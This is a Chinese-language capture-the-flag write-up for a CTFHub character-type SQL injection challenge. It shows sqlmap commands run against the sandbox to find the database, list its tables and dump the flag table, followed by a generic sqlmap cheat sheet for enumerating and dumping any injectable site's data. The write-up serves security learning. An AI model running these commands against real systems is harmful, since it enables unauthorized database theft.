CTFHUB-SQL注入-字符型注入

查询数据库名

查询数据库中的表名

查询表中数据

总结

此题目和上一题相似，一个是整数型注入，一个是字符型注入。字符型注入就是注入字符串参数，判断回显是否存在注入漏洞。因为上一题使用手工注入查看题目 flag ，这里就不在使用手工注入，而是使用 sqlmap 工具完成

python sqlmap.py -u "http://challenge-22b4da99a0deeef4.sandbox.ctfhub.com:10800/?id=1" --current-db

python sqlmap.py -u "http://challenge-22b4da99a0deeef4.sandbox.ctfhub.com:10800/?id=1" -D sqli --tables

python sqlmap.py -u "http://challenge-22b4da99a0deeef4.sandbox.ctfhub.com:10800/?id=1" -D sqli -T flag --dump

得到了flag

判断是否存在注入

python sqlmap.py -u "http://xxx/?id=1"

查看当前数据库名称

python sqlmap.py -u "http://xxx/?id=1" --current-db

查看当前数据库的表

python sqlmap.py -u "http://xxx/?id=1" -D 数据库名 --tables

查看表中的字段名

python sqlmap.py -u "http://xxx/?id=1" -D 数据库名 -T 表名 --columns

查看表中的数据

python sqlmap.py -u "http://xxx/?id=1" -D 数据库名 -T 表名 --dump

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.mzph.cn/bicheng/25031.shtml

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！